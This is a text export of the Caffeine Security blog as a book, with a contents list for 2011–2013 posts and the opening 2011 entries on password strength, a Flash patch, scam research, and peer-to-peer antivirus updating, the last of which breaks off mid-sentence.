Caffeine Security Full Blog Contents

From Blog to Book.
caffeinesecurity.blogspot.com
BlogBook
c 2013 caeinesecurity.blogspot.com
Contents
1 2011 1.1 September . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.1.1 1.1.2 1.1.3 1.1.4 1.1.5 1.1.6 1.1.7 1.1.8 1.1.9 1.1.10 1.1.11 1.1.12 1.1.13 1.1.14 1.2 Welcome (2011-09-20 20:14) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A little note on Password Strength (2011-09-20 20:35) . . . . . . . . . . . . . . . . Emergency Adobe Flash Patch Today (2011-09-21 02:01) . . . . . . . . . . . . . . Research Project: To Catch a Scammer (2011-09-22 02:01) . . . . . . . . . . . . . Abandoning the Client-Server Model (2011-09-22 22:03) . . . . . . . . . . . . . . . Plans Day of Vengeance to Protest Execution, Arrests (2011-09-23 02:00) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Introducing the Scam Fund! (2011-09-24 01:53) . . . . . . . . . . . . . . . . . . . Research Project - Project Picnic Basket (2011-09-24 12:32) . . . . . . . . . . . . Password Cracker Analysis (2011-09-25 14:39) . . . . . . . . . . . . . . . . . . . . More password analysis (2011-09-26 18:18) . . . . . . . . . . . . . . . . . . . . . . Solar Activity could cause severe issues (2011-09-26 22:23) . . . . . . . . . . . . . Listening to a Password Cracker (2011-09-27 21:26) . . . . . . . . . . . . . . . . Guide to Malicious Linux/Unix Commands (2011-09-30 12:21) . . . . . . . . . . . Ducati Motorcycle Default Password Vulnerability. (2011-09-30 12:42) . . . . . . . Anonymous 13 13 13 13 13 14 14 15 15 15 16 16 16 16 17 21 21 21 21 24 25 26 29 31 31 31 3
October . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.2.1 1.2.2 1.2.3 1.2.4 1.2.5 1.2.6 1.2.7 Flash Drives: Helping Spread Malware since Y2K (2011-10-05 03:00) . . . . . . . A look at a simple SSH probe and password crack (2011-10-05 22:05) . . . . . . . Whats in a hackers toolkit? (2011-10-11 20:45) . . . . . . . . . . . . . . . . . . . Netscape 8? Really? (2011-10-12 17:00) . . . . . . . . . . . . . . . . . . . . . . . . Mystery Malware Examined (2011-10-12 18:54) . . . . . . . . . . . . . . . . . . . A look at the various advance fee fraud methods... (2011-10-13 02:00) . . . . . . . BUSTED! (2011-10-17 18:22) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
1.3
November . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.3.1 The Lottery Scam - Jeanis Story (2011-11-07 22:33) . . . . . . . . . . . . . . . .
BlogBook 1.3.2 1.3.3 1.3.4 1.4
CONTENTS 11/16/11 is American Internet Censorship Day (2011-11-16 18:46) . . . . . . . . . If ET were a Hacker, he would just try to phone home... (2011-11-17 18:03) . . . Protecting electronic devices from an EMP attack (2011-11-21 07:26) . . . . . . . 32 32 35 36 36 36 37 39 39 39 42 42 43 44 45 45 46 46 46 47 49 49 49 51 61
December . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1.4.1 1.4.2 1.4.3 1.4.4 1.4.5 1.4.6 1.4.7 1.4.8 1.4.9 1.4.10 1.4.11 1.4.12 1.4.13 1.4.14 1.4.15 1.4.16 1.4.17 1.4.18 1.4.19 1.4.20 See whos trying to hack your Facebook prole! (2011-12-01 20:20) . . . . . . . . Free IT Security Magazines and Whitepapers from TradePub (2011-12-05 17:51) . Misuse of Your Personal Information and Google Alerts (2011-12-08 19:49) . . . . The (VERY) Unocial Guide To Facebook Privacy (2011-12-11 11:35) . . . . . . Introducing Caeine Security Secure Firefox! (2011-12-11 12:49) . . . . . . . . . . Mystery Malware: An echo powered DDoS Script? (2011-12-12 19:33) . . . . . . . Free Subscription to Security Magazine (2011-12-12 20:02) . . . . . . . . . . . . . Iran, a Lost Drone, and a Computer Virus - Lessons to be Learned (2011-12-13 19:57) Holiday Computer Essentials CD (2011-12-15 19:37) . . . . . . . . . . . . . . . . . Insider Threats and Data Loss Prevention (2011-12-16 19:37) . . . . . . . . . . . . New Resource: Threat Watch (2011-12-19 18:12) . . . . . . . . . . . . . . . . . . . Linux/Bckdr-RKC Initial Analysis (2011-12-21 23:32) . . . . . . . . . . . . . . . . Protect Your Family While Using Social Media (2011-12-22 19:57) . . . . . . . . . Linux/Bckdr-RKC: A New Variant Appears (2011-12-26 10:18) . . . . . . . . . .
Woman Gives Birth to Three Plates (2011-12-27 12:59) . . . . . . . . . . . . . . . How to Get a Cyber Security or Information Assurance Job (2011-12-27 19:37) . . Anonymous: Friend or Foe? (2011-12-27 22:59) . . . . . . . . . . . . . . . . . . . Protect Insider Data By Googling First, Often (2011-12-28 10:39) . . . . . . . . . Chinese Origins in .ssyslog Decompiled - Linux/Bckdr-RKC and Hutizu
(2011-12-30 22:33) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Following the Trail: Determining the Origins of Linux/Bckdr-RKC (2011-12-31 12:10)
2 2012 2.1 January . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.1.1 2.1.2 2.1.3 2.1.4 2.1.5 2.1.6 2.2 4 Malware Analysis Lab - New Feature! (2012-01-04 18:26) . . . . . . . . . . . . . . Monitoring for New Zero Day Exploits through Google Alerts (2012-01-06 19:08) Monitoring for Leaked Company Documents through Google Alerts (2012-01-17 14:57) SOPA Blackout Day January 18 (2012-01-18 00:40) . . . . . . . . . . . . . . . . . New @CaSec Twitter Feature: #exploitAlert (2012-01-25 13:30) . . . . . . . . . CaSec SITREP - Cyber Intelligence for the masses (2012-01-27 16:22) . . . . . .
61 61 61 62 62 63 63 63
February . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
CONTENTS 2.2.1 2.3 UPDATED: Hutizu and Linux/Bckdr-RKC now have limited
BlogBook detection 63 64 64 64 64 64 65 66 76 77 77 78 79 79 79 80 80 80 80 81 82 82 83 85 85 85 85 86 86 88 88 5
(2012-02-17 19:01) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
March . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.3.1 2.3.2 2.3.3 2.3.4 2.3.5 2.3.6 2.3.7 2.3.8 2.3.9 2.3.10 2.3.11 2.3.12 2.3.13 Coming Soon: Android for the Paranoid Article Series (2012-03-08 10:39) . . . . . Have you checked out the free security magazines lately, available from Caeine Security? (2012-03-09 15:59) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Hutizu aka Linux/Bckdr-RKC and Duqu Links? Food for Thought.
(2012-03-09 16:28) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Linux/Bckdr-RKC Delivery Method Analyzed (2012-03-10 11:55) . . . . . . . . . Mario 2012 - Help Raise Awareness! (2012-03-17 14:45) . . . . . . . . . . . . . . . Hutizu Under the Hood (2012-03-20 17:00) . . . . . . . . . . . . . . . . . . . . . . Hutizu and Linux/Bckdr-RKC Detection Statistics (2012-03-20 19:13) . . . . . . . Hutizu/Huituzi - Follow the Gray Rabbit (2012-03-20 19:59) . . . . . . . . . . . . Linux Processes Memory Layout, exit, and exit C Functions (2012-03-21 18:35) The Dangers of Social Media Inuencing Real World Actions (2012-03-22 17:30) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Facebook Location Sharing Enabled by Default - Another Threat to your Privacy and Safety (2012-03-26 15:21) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Executable and Linkable Format (ELF) Guide (2012-03-28 12:09) . . . . . . . . . How to Mitigate Anonymous Internet Shutdown March 31 (2012-03-28 18:40) . . Flash Farce:
2.4
April . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.4.1 2.4.2 2.4.3 2.4.4 2.4.5 2.4.6 2.4.7 2.4.8 Why am I in Computer Security? Ask the U.S. Commerce Department
(2012-04-09 13:50) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Project Beekeeper - A Mobile Honeypot Project (2012-04-09 23:00) . . . . . . . . Sony BRAVIA TV Datagram Flooding Denial of Service (2012-04-10 15:04) . . . Ive been losing about 1 lb per day thanks to @ZipFizzCorp (2012-04-10 18:31) .
Warning: Potentially Malicious Unfollow Twitter App (2012-04-12 14:48) . . . . What if your hardware was infected with a virus? (2012-04-16 10:54) . . . . . . . Surely this is a legit lottery email and not a scam... (2012-04-18 15:26) . . . . . . The scammers just keep getting dumber... (2012-04-23 16:34) . . . . . . . . . . .
2.5
May . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.5.1 2.5.2 2.5.3 2.5.4 2.5.5 2.5.6 New Terms of Use - $500 Processing Fee for Comment Spam (2012-05-06 16:17) . My Letter to a Spammer (2012-05-06 17:00) . . . . . . . . . . . . . . . . . . . . . Hacking Your Digital Camera (2012-05-08 22:55) . . . . . . . . . . . . . . . . . . . Android for the Paranoid: Fake GPS (2012-05-10 20:23) . . . . . . . . . . . . . .
Do you test your Antivirus updates before deployment? (2012-05-15 12:59) . . . . Warning: CaeineSecurity dotcom is not mine! (2012-05-23 09:22) . . . . . . . . .
BlogBook 2.5.7 2.6 Keep an eye out for fake Yahoo Browser Plugins! (2012-05-24 11:07)
CONTENTS . . . . . . . 89 90 90 90 91 91 91 91 92 93 93 94 98 99 99
June . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.6.1 2.6.2 Stuxnet not the rst Nation-Sponsored Cyber Attack (2012-06-04 11:52) . . . . . And you Thought your Password Requirements Were Bad... (2012-06-04 13:21) .
2.7
July . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.7.1 2.7.2 2.7.3 2.7.4 2.7.5 2.7.6 2.7.7 2.7.8 Watch my Honeypot LIVE! (2012-07-10 01:07) . . . . . . . . . . . . . . . . . . . . One Image can Change The World (2012-07-17 18:32) . . . . . . . . . . . . . . . . New Hacktool Found on my Honeypot nt (2012-07-18 19:56) . . . . . . . . . . . QR Code Analyzer - Android for the Paranoid (2012-07-20 07:22) . . . . . . . . . Printer Malware - The Next Big Threat? (2012-07-23 13:54) . . . . . . . . . . . . London 2012 Olympics Malware and Scam Alert (2012-07-23 23:05) . . . . . . . . How I cracked the NSA Crypto Challenge in Record Time (2012-07-28 23:33) . . Software Spotlight: Sysinternals RootkitRevealer (2012-07-31 11:17) . . . . . . . .
2.8
August . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.8.1 2.8.2 Default Facebook Privacy Settings Randomly Not Working (2012-08-07 17:00) . .
Time is Running Out: The 2038 Problem (also known as Y2K part two) (2012-08-12 18:04) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100 100 100 100 101 102 102 103 104 104 105 105 105 105 105 106 107 107 108
2.9
September . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.9.1 2.9.2 2.9.3 2.9.4 2.9.5 2.9.6 2.9.7 2.9.8 2.9.9 2.9.10 2.9.11 Having Fun with the EICAR Test File (2012-09-06 17:00) . . . . . . . . . . . . . . Why Wikipedia should never be used as a Technical Reference (2012-09-09 07:04) Using Google Insights to Track Computer Virus Outbreaks (2012-09-09 08:24) . . Learnist: Share What you Know (2012-09-09 13:46) . . . . . . . . . . . . . . . . . How to Choose the Right Antivirus and Firewall (2012-09-10 20:13) . . . . . . . . The Anonymous Lies Keep Building - GoDaddy and Apple (2012-09-11 12:31) . . Zombie Alert - How to Survive the Coming Zombie Apocalypse (2012-09-11 20:48) How Not to Redact a Document (2012-09-16 15:36) . . . . . . . . . . . . . . . . . IE Zero Day Exploit in the Wild (2012-09-17 15:14) . . . . . . . . . . . . . . . . . IE Zero Day and Increase in Global Malware Indicators (2012-09-18 10:51) . . . . Free trial of VIPRE Antivirus Business (2012-09-23 17:26) . . . . . . . . . . . . .
2.10 October . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.10.1 2.10.2 Keccak Chosen by NIST as SHA-3 Hashing Algorithm (2012-10-04 14:00) . . . . . Hurricane Sandy Fake Webcam - A Social Engineering Experiment (2012-10-30 16:42)
2.11 November . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.11.1 2.11.2 6 FDA Fails to Properly Evaluate Medical Device Security per U.S. GAO Report
(2012-11-04 22:41) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Threat Watch updated to include Malware Indicator Trends (2012-11-13 12:16) .
CONTENTS 2.11.3 2.11.4 2.11.5
BlogBook Google Two Factor Authentication - Protect Your Gmail and Google+ Account!
(2012-11-21 21:31) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
108 108 109 109 109 111 113 114 117
Perpetual Eorts in Futility - A History of Computing Security (2012-11-24 20:06) Linux Rootkit bum.pdf dropped onto my Honeypot Today (2012-11-26 20:06) .
2.12 December . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.12.1 2.12.2 2.12.3 2.12.4 3 2013 3.1 January . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3.1.1 3.1.2 3.1.3 3.1.4 3.1.5 3.1.6 3.1.7 3.1.8 3.1.9 3.2 Anonymous and Steganography - Blindly Distributing Terrorist Messages?
(2013-01-03 12:12) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Detecting Targeted Malware and Advanced Persistent Threats (2012-12-06 19:24) How (not) to handle software vulnerability submissions (2012-12-26 11:51) . . . . Snapchat Covert Screen Capture for Android Revealed (2012-12-30 03:02) . . . . Root @th3j35t3r with Google Chrome (2012-12-31 13:46) . . . . . . . . . . . . . .
117 117 121 122 123 124 124 124 125 126 127 127 128 129 130 134 134 134 134 136 137 137 7
DISA Gold Disk and SRR - The Lost Security Tools (2013-01-07 10:46) . . . . . . If Anonymous is to Survive They Must Remove the Mask (2013-01-13 11:51) . . . Seculert Using Scare Tactics to Obtain Customers? (2013-01-13 12:04) . . . . . . Spam (2013-01-13 12:05) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Do you enjoy my posts? Nominate me for a Shorty award! (2013-01-15 15:41) . . Reaching out to the @EFF for assistance with DISA Gold Disk and UNIX SRR FOIA Request (2013-01-17 17:30) . . . . . . . . . . . . . . . . . . . . . . . . . . . Entropia - The Online Sweatshop Scam (2013-01-28 11:06) . . . . . . . . . . . . . Anatomy of a Twitter False Flag-Spam and Dox Attack (2013-01-28 22:03) . . . .
February . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3.2.1 3.2.2 3.2.3 3.2.4 3.2.5 White House to Issue Cyber Security Executive Order (2013-02-11 21:39) . . . . . Identity of @th3j35t3r Revealed (2013-02-14 20:14) . . . . . . . . . . . . . . . . . Tracking Your Digital Footprint with Google (2013-02-18 23:59) . . . . . . . . . . Facebook Graph Search and OSINT (2013-02-20 20:21) . . . . . . . . . . . . . . . Browsing Safely on an Unsecured Network (2013-02-21 20:00) . . . . . . . . . . .
3.3
March . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3.3.1 3.3.2 3.3.3 3.3.4 3.3.5 Caeine Security Blogging On The Go! (2013-03-05 21:48) . . . . . . . . . . . . . Guest Post: Ransomware Threat Escalates Worldwide (from @pentesttraining)
(2013-03-07 19:18) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
FREE Game Download: PC Defender (2013-03-16 00:51) . . . . . . . . . . . . . . CASP now DoD 8570 Approved - Free Practice Exams to Help Study!
(2013-03-16 15:34) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Anonymous OpIsrael - Prelude to a Hamas Attack? (2013-03-16 16:43) . . . . . .
BlogBook 3.3.6 3.3.7 3.4
CONTENTS Threat Watch Updated with Cyber Threat Forecasting (2013-03-25 09:01) . . . . Free Windows 8 Security eBook! Expires 4/4 (2013-03-29 21:29) . . . . . . . . . . 138 139 139 139 141 142 142 142 143 143 144 145 146 146 146 148 149
April . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3.4.1 3.4.2 3.4.3 3.4.4 3.4.5 3.4.6 3.4.7 3.4.8 3.4.9 3.4.10 3.4.11 3.4.12 3.4.13 3.4.14 3.4.15 The Cyber Security Silver Bullet is Finally Here! (2013-04-01 14:08) . . . . . . . If you could ask a question about Space Security what would it be? (2013-04-02 19:51) Hackers Breakfast - Absolutely Great Learning Experience (2013-04-03 20:00) . . Voices in the Static: Proactive Cyber Threat Monitoring (2013-04-05 17:26) . . . New Research Project: Project Ackbar (Its A Trap!) (2013-04-08 19:36) . . . . . How Rockets and Spacecraft Are Controlled Remotely (2013-04-12 10:42) . . . . . Could you Hack the Mars Rover? (2013-04-12 10:58) . . . . . . . . . . . . . . . . A Potential Look at the Security Technology Behind #Antares and #Cygnus Remote Control (2013-04-12 12:14) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Want to Give Me Feedback During the Antares Launch Event? Call Me!
(2013-04-12 19:46) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Space Security Article Series - Stay Tuned! (2013-04-18 23:22) . . . . . . . . . . . Police Scanners and COMSEC (or lack thereof) (2013-04-19 11:16) . . . . . . . . Space Security Starts on the Ground (2013-04-19 20:03) . . . . . . . . . . . . . . . When it Comes to Space Security, Safety is Key (2013-04-21 16:21) . . . . . . . . Hacking the News for Prot - Stock Short Selling (2013-04-23 20:15) . . . . . . .
Guest Post: I Can Have Most of My Threat Research Tools in a Single Interface? (2013-04-26 14:06) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150 151 151 151 154 154 155 156 156 158 159 159 160 161
3.5
May . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3.5.1 3.5.2 3.5.3 3.5.4 3.5.5 3.5.6 3.5.7 3.5.8 3.5.9 3.5.10 3.5.11 3.5.12 April 2013 Set a New Record for My Blog - Over 14,000 page views! (2013-05-01 11:39) Bypassing Tripwire and MD5 Hash Checking for Advanced Persistent Threats (2013-05-01 12:29) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . OpUSA to Strike US Government and Banking Infrastructure May 7 (2013-05-05 00:42) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . eBook Review: The Password Management Guide (2013-05-05 11:02) . . . . . . . #OpUSA - So far an Epic Failure (2013-05-06 23:07) . . . . . . . . . . . . . . . . OpUSA Updated Target List Posted (2013-05-07 00:33) . . . . . . . . . . . . . . . The NSAs Guide to Internet Research (2013-05-08 19:40) . . . . . . . . . . . . . OpUSA Failure Shows Anonymous is Past Their Prime (2013-05-08 22:18) . . . . Identifying Hacker Group Locations Based Upon Temporal Signatures
(2013-05-09 19:15) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Hacking to Setup a Free Counter Strike Server? (2013-05-10 16:05) . . . . . . . . IRC Floodbot Placed on My Honeypot (2013-05-11 01:09) . . . . . . . . . . . . . @USNISTGOV CVE Alerts Now On @CaSec Twitter (2013-05-11 08:22) . . . .
CONTENTS 3.5.13 3.5.14 3.5.15 3.5.16 3.5.17 3.5.18 3.5.19 3.5.20 3.5.21 3.5.22 3.5.23 3.6
BlogBook How Not to Redact a Document, Part 2 (2013-05-11 09:29) . . . . . . . . . . . . . New Honeypot Online! (2013-05-11 18:10) . . . . . . . . . . . . . . . . . . . . . . Facebook Graph Search and Anonymous (2013-05-12 20:58) . . . . . . . . . . . . Possibly Malicious Tor Exit Node Found in the Wild (2013-05-17 14:37) . . . . . . Tor and Censorship (2013-05-17 19:22) . . . . . . . . . . . . . . . . . . . . . . . . OpPetrol - Its Not About the Oil (2013-05-19 14:32) . . . . . . . . . . . . . . . . FREE CLASS!!! Malicious Software and its Underground Economy (2013-05-19 23:41) An Open Letter to @ChaCha Regarding Copyright Infringement (2013-05-20 03:00) Tech Support SCAM! The MUST SEE Video about iYogi! (2013-05-21 00:15) . . @ChaCha You Guys Rock, Thanks for the Help! (2013-05-21 00:35) . . . . . . . . FREE eBook: Intrusion Detection Systems with Snort: Advanced IDS Techniques (2013-05-22 19:17) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161 164 164 164 164 165 166 166 168 168 169 170 170 173 174 174 175 178 178 179 179 179 180 181 181 182 184 185 186 186 186 9
June . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3.6.1 3.6.2 3.6.3 3.6.4 3.6.5 3.6.6 3.6.7 3.6.8 Using Shodan to Measure The Security of the Internet (2013-06-01 02:01) . . . . . Unauthenticated Windows CE Telnet Service Vulnerable Conguration
(2013-06-01 02:31) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
New PHP Malware Source Available for Analysis (2013-06-09 00:17) . . . . . . . . Come Join Me On @ThreatConnect and Share Cyber Threat Intelligence
(2013-06-13 19:46) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Anonymous #OpPetrol Most Epic #Fail Yet - Full Analysis Of Results

(2013-06-21 10:47) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Coming Changes and Improvements to Caeine Security Blog (2013-06-25 17:00) Recorded Future Announces Cyber Threat Intelligence Application (2013-06-28 20:42) Guest Post: Hackers Breakfast: TrainACE and n2grate Team Up for a Free Hacking Seminar (2013-06-28 20:58) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
3.7
July . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3.7.1 3.7.2 3.7.3 3.7.4 3.7.5 3.7.6 3.7.7 A Confession to my Twitter Users - And Thank You (2013-07-01 23:18) . . . . . . Android Pacemaker Exploit Kit Released In Memory of Barnaby Jack (2013-07-28 04:13) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . (2013-07-28 18:31) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . PaceXploit - The Truth Revealed, and an Apology (2013-07-28 23:11) . . . . . . . How Vulnerable Is The Emergency Alert System? (2013-07-29 19:44) . . . . . . . DISA Gold Disk FOIA Request Sent (2013-07-30 10:55) . . . . . . . . . . . . . . . URGENT! McAfee VirusScan Artemis False Positives! (2013-07-31 20:32) . . . . .
3.8
August . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3.8.1 3.8.2 @th3j35t3r Domain Seized by DHS, Arrested at Blackhat? (2013-08-02 14:24) . . Blog Updated to Include Shodan Searches and Free Security Resources
(2013-08-02 23:10) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
BlogBook 3.8.3 3.8.4 3.8.5 3.8.6 3.8.7 3.8.8 3.8.9 3.8.10 3.8.11 3.8.12 3.8.13 3.8.14 3.8.15 3.8.16 3.8.17 3.8.18 3.8.19 3.8.20 3.8.21 3.8.22 3.8.23 3.9
CONTENTS New Shodan Search: Trilithic (2013-08-02 23:36) . . . . . . . . . . . . . . . . . . . Massive TOR Hidden Service Compromise (2013-08-04 13:59) . . . . . . . . . . . What the FBI probably knows about Tor Users (2013-08-05 00:31) . . . . . . . . Buyers Guide: Selecting an SSL Management System (2013-08-07 15:47) . . . . . 304% Return on Investment with SilverSky Network Security Solutions
(2013-08-08 14:32) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
186 187 187 188 188 189 189 189 190 190 191 192 193 193 194 194 194 195 196 200 200 200 200 201 202 202 203 204
SilverSky Email Encryption Demo (2013-08-08 14:32) . . . . . . . . . . . . . . . . Email Data Loss Prevention (DLP) (2013-08-08 14:32) . . . . . . . . . . . . . . . The Evolution and Value of Purpose-Built Backup Appliances (2013-08-08 20:47) Symantec Intelligence Report: June 2013 (2013-08-13 22:47) . . . . . . . . . . . . Boldly Go Where No Deduplication Has Gone Before (2013-08-15 12:32) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A Look At A Simple PHP Cross Site Scripting Attack (2013-08-18 02:00) . . . . . How Virtualization is Key to Managing Risk for the SMB Market (2013-08-19 18:32) Implementing Enterprise BYOD with Mobile Certicates (2013-08-21 17:33) . . . A Look at Fax Phishing (2013-08-22 18:57) . . . . . . . . . . . . . . . . . . . . . . My Free Magazines! New Website! (2013-08-24 15:51) . . . . . . . . . . . . . . . . Blade Server Strategies: Optimizing the Data Center (2013-08-27 16:47) . . . . . Why the Syrian Electronic Army Didnt Hack the NY Times (2013-08-27 20:18) . #ALERT: As Tensions Escalate with Syria, Beware Phishing Attacks
(2013-08-27 23:21) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
HP StoreOnce:
Anon Steganography Cracked, Further Mysteries Lie Within (2013-08-30 01:10) . How to Avoid the Coming Backup Crunch (2013-08-30 16:33) . . . . . . . . . . . Dell AppAssure 5: Free Trial Download (2013-08-30 16:33) . . . . . . . . . . . . .
September . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3.9.1 3.9.2 3.9.3 3.9.4 3.9.5 3.9.6 3.9.7 3.9.8 Android for the Paranoid - Radiation Alarm (2013-09-02 19:02) . . . . . . . . . . Eagle Bank Uses Single Sign-On to Secure Deposits and Customer Data (2013-09-04 19:31) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . How Single Sign-On Helped Republic Bank Relieve Password Headaches
(2013-09-04 19:31) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Exchange ActiveSync and BYOD: Potential for Disaster or Foundation for Mobile Success (2013-09-05 13:32) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Legacy Applications - The Swiss Cheese of Security (2013-09-08 11:38) . . . . . . Staying Secure in a Cloudy World (2013-09-16 17:32) . . . . . . . . . . . . . . . .
Real-Time Security Intelligence for Greater Visibility and Information-Asset Protection (2013-09-16 17:32) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 204 Identity and Access Governance: Bringing Business and IT Together 205
(2013-09-16 17:32) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
10
CONTENTS 3.9.9 3.9.10 3.9.11
BlogBook Security and HIPAA Compliance: Meeting the Challenge of Securing Protected Health Information (2013-09-16 18:47) . . . . . . . . . . . . . . . . . . . . . . . . Top 10 Security Best Practices for Small Business (2013-09-19 14:32) . . . . . . . 206 206
Tricks of the Trade - New Whitepaper Available (Malware evading Intrusion Detection) (2013-09-21 13:58) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207
11
BlogBook
CONTENTS
12
Chapter 1
2011
1.1
1.1.1
September
Welcome (2011-09-20 20:14)
Welcome to Caeine Security. Here you will nd a daily dose of interesting security articles, news clips, white papers, and research. Computer Security...Cyber Security...Information Assurance...whatever you call it, you know the purpose. Protect computer systems and networks from pretty much everything, including malicious users, clueless users, and even mother nature herself! Each day I will try to post one security-related news item. At least once every other week I will be posting some of my thoughts and my own research in the computer security/cyber security/information assurance eld. So why Caeine Security? Obviously were not trying for protect the secret formula to our favorite soft drinks... but if youre like me, you probably consume large quantities of caeine just to keep you going in todays stressful security world. Enjoy, and try to have a little fun!
1.1.2
A little note on Password Strength (2011-09-20 20:35)
Ive always wondered why organizations encourage such strict, hard to remember, password combinations, ultimately resulting in the user being forced to write down the password, making the password less secure. xkcd, a web comic, denes the problem perfectly...[1]xkcd: Password Strength
1. http://xkcd.com/936/
1.1.3
Emergency Adobe Flash Patch Today (2011-09-21 02:01)
Good Morning! Today we will be treated to an emergency patch for Adobe Flash. [1]Prenotication: Security Update for Flash Player Keep an eye on Adobes [2]security bulletins page for the patch. Apparently this patch will address zero-day vulnerabilities which are currently being exploited. Happy Patching!
1. http://blogs.adobe.com/psirt/2011/09/prenotification-security-update-for-flash-player.html 2. http://www.adobe.com/support/security/
13
BlogBook
1.1. September
1.1.4
Research Project: To Catch a Scammer (2011-09-22 02:01)
My rst featured research project on this site will be To Catch a Scammer. Im sure youve heard of NBCs [1]To Catch a Predator. The idea behind this research project is to examine internet scams and frauds, such as Advance Fee Fraud aka Nigerian 419 scam, auction scams, stock scams, etc. I am currently researching the techniques used by Advance Fee Fraud scammers. Surely this will be lled with fun. Im already conversing with one of the scammers, and will be uploading some rather interesting ndings soon.
1. http://en.wikipedia.org/wiki/To_Catch_a_Predator
1.1.5
Abandoning the Client-Server Model (2011-09-22 22:03)
Once every two weeks, I will try to write an in-depth blog post on an interesting topic within the security community. My rst topic is why the client-server model should be abandoned for antivirus and host intrusion detection/prevention. It always seems that malware creators are always 1 step ahead of the security community. Their methods for deploying and updating sophisticated botnets seems to be ever evolving, while the security community lags behind in technology. Case in point - [1]Concker. This amazing piece of malware is protected by cryptographically signed updates using 4096 bit RSA keys, distributed through peer-to-peer updating, instead of the traditional client-server model using a centralized command center. And yet, all home-based and enterprise virus scanner and host intrusion detection/prevention software suites rely upon the client-server model. While this decades old technology is tried and true, it contains one major aw. Shut o access to the central command server(s), and the system no longer receives updates, or reports detected problems. The bad guys know this, and actually program their malware to disable updates by editing the hosts le of infected systems to redirect the domain names of common antivirus vendors to non-existant (or malicious) IP addresses! I feel it is time to abandon the client-server model for antivirus and intrusion detection. The bad guys are using peer-to-peer technology, why dont we? It makes much more sense to me to create a cryptographically secure 